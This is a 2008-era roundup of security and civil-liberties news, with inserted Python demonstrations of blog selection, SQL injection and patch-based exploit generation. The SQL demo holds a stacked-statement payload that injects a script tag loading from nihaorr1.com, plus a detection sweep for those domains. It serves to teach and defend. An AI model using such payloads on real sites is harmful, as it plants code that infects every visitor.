CASCADES project: Cost-effective Outbreak Detection in Networks (a study by the School of Computer Science, Carnegie Mellon University): "Rankings are based on the following question: Which blogs should one read to be most up to date, i.e., to quickly know about important stories that propagate over the blogosphere?
Budget=100 blogs: If I can read 100 blogs, which should I read to be most up to date? Unit cost (each blog costs 1 unit), optimizing the information captured -- population affected (we want to be the first to know about something with many people blogging about the story after us) read more »
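As an added illustration of the "Budget=100 blogs" question above (this is example code written for this page, not the CMU CASCADES project's own code or data): a greedy selection over a handful of constructed cascades. Each story is a list of (blog, time) posts; the score of a set of blogs is the number of posts that appear after the earliest selected blog picked the story up, which is the "population affected" idea of being first to know. Costs default to one unit per blog, so the budget is simply a number of blogs, but a per-blog cost map is accepted as well.

```python
"""Greedy blog selection under a budget, in the spirit of the CASCADES
ranking.  Added example: the cascades, blog names and the way 'population
affected' is scored are all constructed for this demo."""

from typing import Dict, Iterable, List, Optional, Tuple

# Constructed data: story -> posts as (blog, time), sorted by time.
CASCADES: Dict[str, List[Tuple[str, int]]] = {
    "story1": [("alpha", 0), ("beta", 1), ("gamma", 2), ("delta", 3), ("eps", 4)],
    "story2": [("beta", 0), ("gamma", 1), ("zeta", 2), ("alpha", 5)],
    "story3": [("gamma", 0), ("delta", 1), ("eps", 2), ("zeta", 3), ("beta", 4), ("alpha", 6)],
    "story4": [("zeta", 0), ("eps", 1)],
}


def population_affected(selected: Iterable[str], cascades: Dict[str, List[Tuple[str, int]]]) -> int:
    """Score a set of blogs: for every story, count the posts written after
    the earliest selected blog covered it.  Those are the bloggers we beat
    to the story; stories no selected blog ever covers contribute nothing."""
    selected = set(selected)
    total = 0
    for posts in cascades.values():
        times = [t for blog, t in posts if blog in selected]
        if not times:
            continue
        first = min(times)
        total += sum(1 for _, t in posts if t > first)
    return total


def greedy_select(cascades: Dict[str, List[Tuple[str, int]]], budget: int,
                  cost: Optional[Dict[str, int]] = None) -> Tuple[List[str], int]:
    """Greedy hill-climbing: repeatedly add the affordable blog with the
    largest marginal gain per unit cost, stopping when no blog improves the
    score or nothing else fits in the budget.  Unit cost when 'cost' is None."""
    cost = cost or {}
    blogs = sorted({b for posts in cascades.values() for b, _ in posts})
    selected: List[str] = []
    spent = 0
    current = 0
    while True:
        best, best_gain = None, 0.0
        for b in blogs:
            if b in selected:
                continue
            c = cost.get(b, 1)
            if spent + c > budget:
                continue
            gain = (population_affected(selected + [b], cascades) - current) / c
            if gain > best_gain:          # strict: first blog in sorted order wins ties
                best, best_gain = b, gain
        if best is None:
            break
        selected.append(best)
        spent += cost.get(best, 1)
        current = population_affected(selected, cascades)
    return selected, current


if __name__ == "__main__":
    print(greedy_select(CASCADES, 2))                     # unit cost, read two blogs
    print(greedy_select(CASCADES, 2, cost={"gamma": 3}))  # gamma too expensive to read
```

With unit costs and a budget of two, the greedy pass picks gamma first (it is early on three of the four stories) and then alpha; if gamma is priced out, the choice shifts to beta and delta. The marginal-gain loop is the expensive part, which is why the original work needs a lazy evaluation trick to scale to tens of thousands of blogs; this toy recomputes the score from scratch.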
Help EFF Examine Once-Secret FBI Docs: "
We've already started scouring newly-released documents relating to the misuse of National Security Letters to collect Americans' private information. But don't let us have all the fun — you, too, can dive into the docs and help uncover the truth about the FBI's abuse of power. All 1138 pages are freely downloadable (with searchable text) from EFF’s website, and we'll be posting a new batch every month." read more »
Web firm sounds alert on criminal data trove - Via Reuters:
LONDON (Reuters) - A Web security firm said on Tuesday it had tipped off international banks and police after finding a huge trove of stolen business and personal data amassed on a server in the space of just three weeks.
Finjan Inc said it had notified the U.S. Federal Bureau of Investigation, police in various countries and more than 40 financial institutions in the United States, Europe and India about the discovery of the so-called "crimeserver".
"This server was running for about three weeks and within this period it managed to collect 1.4 gigabytes of data. It is indeed the largest treasure we've found in this very short time," Yuval Ben-Itzhak, chief technology officer of the California-based firm, said in a phone interview from Israel.
The stolen data consisted of 5,388 unique log files including 1,037 from Turkey, 621 from Germany, 571 from the United States, 322 from France, 308 from India and 232 from Britain. read more »
500 Thousand MS Web Servers Hacked - Via Slashdot:
andrewd18 writes "According to F-Secure, over 500,000 webservers across the world, including some from the United Nations and UK government, have been victims of a SQL injection. The attack uses an SQL injection to reroute clients to a malicious javascript at nmidahena.com, aspder.com or nihaorr1.com, which use another set of exploits to install a Trojan on the client's computer. As per usual, Firefox users with NoScript should be safe from the client exploit, but server admins should be alert for the server-side injection. Brian Krebs has a decent writeup on his Washington Post Security Blog, Dynamoo has a list of some of the high-profile sites that have been hacked, and for fun you can watch some of the IIS admins run around in circles at one of the many IIS forums on the 'net."
(Read Original Article - Via Slashdot.)
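An added example of the server-side pattern the post describes (written for this page; not code from the Slashdot post, F-Secure or Krebs): a lookup built by string concatenation lets one request parameter append a script tag pointing at one of the named domains to every stored page body, so every visitor is then sent to the malicious script; the parameterised version of the same query treats the payload as data. A sweep over stored content that flags script sources on those domains is included as the check an admin would run. The table, column names, request parameter and the use of SQLite are constructed for the demo; SQLite's `executescript` stands in for a database driver that accepts stacked statements.

```python
"""Added example: SQL injection that rewrites stored content, its
parameterised counterpart, and a sweep for injected script tags."""

import re
import sqlite3
from typing import List, Tuple

# Domains named in the post.  Any <script src=...> on them is a hit.
MALICIOUS_DOMAINS = ("nmidahena.com", "aspder.com", "nihaorr1.com")

SCRIPT_SRC_RE = re.compile(
    r'<script[^>]*\bsrc\s*=\s*["\']?(?:https?:)?//([^/"\'\s>]+)', re.IGNORECASE)


def setup_db() -> sqlite3.Connection:
    """Constructed sample: two stored page bodies."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, body TEXT)")
    conn.executemany("INSERT INTO pages (id, body) VALUES (?, ?)",
                     [(1, "<h1>Home</h1>"), (2, "<h1>About</h1>")])
    conn.commit()
    return conn


def handle_request_vulnerable(conn: sqlite3.Connection, page_id: str) -> None:
    """The bug: the request parameter is pasted into the SQL text.
    executescript runs every statement the attacker stacked after the
    quote, which is what makes a one-line UPDATE of every row possible."""
    conn.executescript(f"SELECT body FROM pages WHERE id = '{page_id}'")


def handle_request_safe(conn: sqlite3.Connection, page_id: str) -> List[str]:
    """The fix: a bound parameter.  The payload can only ever be compared
    against id; it is never parsed as SQL."""
    cur = conn.execute("SELECT body FROM pages WHERE id = ?", (page_id,))
    return [row[0] for row in cur]


def find_injected(conn: sqlite3.Connection,
                  domains: Tuple[str, ...] = MALICIOUS_DOMAINS) -> List[Tuple[int, str]]:
    """Sweep stored bodies for script tags sourced from the listed domains
    (exact host or a subdomain of it).  Returns (page id, host) per hit."""
    hits = []
    suffixes = tuple("." + d for d in domains)
    for page_id, body in conn.execute("SELECT id, body FROM pages ORDER BY id"):
        for host in SCRIPT_SRC_RE.findall(body or ""):
            host = host.lower()
            if host in domains or host.endswith(suffixes):
                hits.append((page_id, host))
    return hits


def demo() -> List[Tuple[int, str]]:
    """Constructed attack request: closes the quote, stacks an UPDATE that
    appends a script tag to every body, and comments out the rest."""
    conn = setup_db()
    payload = ("1'; UPDATE pages SET body = body || "
               "'<script src=\"http://nihaorr1.com/1.js\"></script>'; --")
    assert handle_request_safe(conn, payload) == []   # parameterised: nothing happens
    assert find_injected(conn) == []                  # content still clean
    handle_request_vulnerable(conn, payload)          # concatenated: every row rewritten
    return find_injected(conn)


if __name__ == "__main__":
    print(demo())
```

The sweep is the practical part: with hundreds of thousands of servers hit, the injected tag sits in database text columns rather than in files on disk, so grepping the web root finds nothing; the stored content has to be scanned (and the query that let it in has to be parameterised, or the rows will be rewritten again).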
Yale Information Society Project's 9.5 Theses for Technology Policy in the Next Administration - Via CFP: Technology Policy '08:
The theme of the 18th Annual Computers, Freedom, and Privacy Conference is "Technology Policy '08." To help shape public debate in this election year, the Information Society Project at Yale Law School recommends the following policy principles - The 9.5 Theses for Technology Policy in the Next Administration: read more »
Universities Baffled By Massive Surge In RIAA Copyright Notices - Via Threat Level:
In the last 10 days, universities around the country have seen more than a 20-fold increase in the number of filesharing takedown notices from the recording industry, in an unexplained spike that seems focused on colleges in the Midwest.
The spike is not matched by an increase in actual file sharing.
"Universities are getting as many notices from the RIAA in one day as what they would typically get from all content owners in a month," says Mark Luker, a vice president of higher education technology advocate Educause.
Indiana University says that starting on April 21, the Recording Industry Association of America began sending 80 legal notices a day to the university, under the Digital Millennium Copyright Act. Typically, the university handles less than 100 such notices a month from the RIAA, the Motion Picture Association of America and HBO combined. read more »
Court-Approved Wiretapping Rose 14% in '07 - Via Threat Level:
Last year might have been a rough year for U.S. home prices, but growth in government wiretaps remained healthy, with the eavesdropping sector posting a 14% increase in court orders compared to 2006. In 2007, judges approved 4,578 state and federal wiretaps, as compared to 4,015 in 2006, according to two new reports on criminal and intelligence wiretaps.
Editor: Interesting graphic removed. Go to original site for that [...]
State police applied for 27% more wiretaps in 2007 than in 2006, with 94% of them targeting cell phones, according to figures released by the U.S. Courts' administrator. In 2007, state judges approved 1,751 criminal wiretap applications, without turning any of them down, according to the report (.pdf). That's a nearly threefold increase in state wiretaps since 1997. Federal criminal wiretaps remained fairly constant -- hovering around 500 -- though exact numbers aren't known since the Justice Department has begun withholding information from the administrators of the U.S. courts regarding sensitive investigations. read more »
Declassified NSA Document Reveals the Secret History of TEMPEST - Via Threat Level:
It was 1943, and an engineer with Bell Telephone was working on one of the U.S. government's most sensitive and important pieces of wartime machinery, a Bell Telephone model 131-B2. It was a top secret encrypted teletype terminal used by the Army and Navy to transmit wartime communications that could defy German and Japanese cryptanalysis.
Then he noticed something odd.
Far across the lab, a freestanding oscilloscope had developed a habit of spiking every time the teletype encrypted a letter. Upon closer inspection, the spikes could actually be translated into the plain message the machine was processing. Though he likely didn't know it at the time, the engineer had just discovered that all information processing machines send their secrets into the electromagnetic ether. read more »
After Records Reveal E-Voting Glitches, Election Official Jokes She'll Stop Keeping Records - Via Threat Level:
Kathy Dent, the election director in Sarasota County, Florida, was the target of controversy after the 2006 election when more than 18,000 ballots cast on ES&S touch-screen voting machines in her county showed no vote cast in the 13th congressional district race. The so-called undervote rate in that race was five times what is considered normal and resulted in two lawsuits filed by voters and the defeated candidate, Christine Jennings, who lost the congressional seat by fewer than 400 votes. read more »
AT&T Denies Resetting P2P Connections - Via Slashdot: Your Rights Online:
betaville points out comments AT&T filed with the FCC in which they denied throttling traffic by resetting P2P file-sharing connections. Earlier this week, a study published by the Vuze team found AT&T to have the 25th highest (13th highest if extra Comcast networks are excluded) median reset rate among the sampled networks. In the past, AT&T has defended Comcast's throttling practices, and said it wants to monitor its network traffic for IP violations. read more »
Online privacy: railing against the accepted - Via Network World on Privacy:
A Pew Internet survey shows that more Internet users now accept Big Brother at work and think that information about them on the Internet is accurate.
[...]
I frequently use this column to rail against threats to the privacy of Internet users, both from government and the private sector. (For example, see last week’s column). I just found a survey published late last year by the Pew Internet & American Life Project that reports that people are coming to support, or at least not object too strongly to, some types of spying. read more »
ACLU Says Fusion Centers Remain Problematic - Via American Civil Liberties Union:
Washington, DC – As a Senate subcommittee met today to get a "progress report" on fusion centers, the American Civil Liberties Union once again voiced its concerns with the intelligence-gathering institutions. The Senate Homeland Security and Governmental Affairs Subcommittee on State, Local, and Private Sector Preparedness and Integration heard testimony from government and intelligence officials on a recent report issued by the Government Accountability Office (GAO) regarding the centers. Though several recent reports have confirmed fusion centers’ growing role in law enforcement and revealed their expanding ties to private industry, including relationships with massive data-brokering companies, no third parties were set to testify. The ACLU released a report last year outlining serious concerns with fusion centers.
"Fusion centers have the potential to be privacy nightmares," said Caroline Fredrickson, director of the ACLU Washington Legislative Office. "Every inch of privacy we surrender gives the government a mile of latitude to invade it further. There’s simply too much we don’t know. Strict guidelines must be put in place and enforced. We urge the subcommittee and all of Congress to keep a close eye on those who are keeping a close eye on us." read more »
Automatic Patch-Based Exploit Generation - Via cs.cmu.edu:
by David Brumley, Pongsin Poosankam, Dawn Song, and Jiang Zheng
Abstract
The automatic patch-based exploit generation problem is: given a program P and a patched version of the program P', automatically generate an exploit for the potentially unknown vulnerability present in P but fixed in P'. In this paper, we propose techniques for automatic patch-based exploit generation, and show that our techniques can automatically generate exploits for vulnerable programs based upon patches provided via Windows Update. read more »
Windows Update Can Hurt Security - Via Slashdot:
An anonymous reader writes
"Researchers at Carnegie Mellon University have shown that given a buggy program with an unknown vulnerability, and a patch, it is possible automatically to create an exploit for unpatched systems. They demonstrate this by showing automatic patch-based exploit generation for several Windows vulnerabilities and patches can be achieved within a few minutes of when a patch is first released. From the article: 'One important security implication is that current patch distribution schemes which stagger patch distribution over long time periods, such as Windows Update... can detract from overall security, and should be redesigned.' The full paper is available as PDF, and will appear at the IEEE Security and Privacy Symposium in May."
(Read Original Article - Via Slashdot.)
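An added example of the idea behind the CMU paper above and the Slashdot summary of it (this is illustration code written for this page, not the authors' tool): the patched program P' differs from P by one added check, so any input that P' rejects at that check, and that P otherwise accepts, drives P down the path the patch removed. The paper works on Windows binaries and hands the condition for reaching the new check to a decision procedure; here P and P' are small Python functions over a constructed two-field message, the free variable is a 16-bit length field, and the "solver" is plain enumeration of that field. The message format and buffer size are constructed; the unpatched version reports an overflow instead of performing one.

```python
"""Added example: patch-based exploit generation on a toy message parser.
P trusts a length field; P' adds a bounds check.  We find the input P'
rejects at the new check and confirm P would overflow on it."""

import struct
from typing import Iterator, Optional, Tuple

BUF_SIZE = 64   # constructed: size of the fixed buffer the payload is copied into


def parse_header(msg: bytes) -> Optional[int]:
    """Shared parsing in both versions: 2-byte magic 'RQ', then a 2-byte
    big-endian payload length.  Returns the length, or None on a bad header."""
    if len(msg) < 4 or msg[:2] != b"RQ":
        return None
    return struct.unpack(">H", msg[2:4])[0]


def p_unpatched(msg: bytes) -> str:
    """P: copies 'length' bytes into a BUF_SIZE buffer without checking.
    Simulated: report 'overflow' where the real program would smash the buffer."""
    n = parse_header(msg)
    if n is None:
        return "bad_header"
    return "overflow" if n > BUF_SIZE else "ok"


def p_patched(msg: bytes) -> str:
    """P': identical to P except for the one added check."""
    n = parse_header(msg)
    if n is None:
        return "bad_header"
    if n > BUF_SIZE:                 # <-- the patch
        return "rejected_by_patch"
    return "ok"


def candidate_inputs() -> Iterator[bytes]:
    """The input space the path constraint ranges over.  The header
    constraint (magic == b'RQ') is fixed; the length field is free."""
    for n in range(0x10000):
        yield b"RQ" + struct.pack(">H", n)


def generate_exploit() -> Optional[Tuple[bytes, bool]]:
    """Search for an input that (1) reaches and fails the patch-added check
    in P' and (2) passes P's remaining checks.  The second element is the
    verification step: does P actually reach the buggy state on it?"""
    for msg in candidate_inputs():
        if p_patched(msg) == "rejected_by_patch" and p_unpatched(msg) != "bad_header":
            return msg, p_unpatched(msg) == "overflow"
    return None


if __name__ == "__main__":
    print(generate_exploit())
```

Enumerating a 16-bit field is fine here and hopeless for real inputs, which is why the paper needs a constraint solver; the structure of the search is the same either way: the patch tells you which condition to falsify, and the unpatched program tells you whether the result is really an exploit. That is also why the timing of patch distribution matters, as the Slashdot summary notes: the candidate input exists as soon as P' is in hand.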
FBI General Counsel Questioned on EFF NSL Report - Via EFF: Deep Links:
At a hearing of the House Judiciary Committee today, FBI General Counsel Valerie Caproni faced tough questions about the EFF Report on the abuse of a National Security Letter (NSL) to North Carolina State University at Raleigh.
In her testimony, Caproni speculated that this misuse of the NSL might have been the result of a "miscommunication." According to a 2007 report by Caproni's Office of the General Counsel, however, the FBI Charlotte Division "acted upon the advice and direction of FBIHQ [and] Charlotte personnel sought legal advice prior to the service of the NSL." FBI documents show that the NSL at issue was reviewed by the Senior Supervisory Special Agent for the Raleigh office, and then reviewed by the Special Agent in Charge of the Atlanta Division before being signed. read more »
EFF Issues Report on Abuse of National Security Letter - Via EFF: Deep Links:
Today, EFF published a report on the misuse of a National Security Letter to seek educational records from North Carolina State University at Raleigh in 2005. The NSL authority does not allow the government to seek educational records.
The detailed report stems from EFF's Freedom of Information Act request for records about NSL abuse. FBI documents show that, over the span of three days in July 2005, the Charlotte Division of the FBI first obtained educational records pursuant to a grand jury subpoena, and then -- at the direction of FBIHQ -- returned the records and sought them again pursuant to an improper NSL.
The improper NSL was refused by the university, but the FBI finally obtained them pursuant to a second grand jury subpoena. Later in July 2005, FBI Director Robert Mueller used the delay in obtaining these particular records as an example of why the FBI needed administrative subpoena power instead of NSLs in testimony. read more »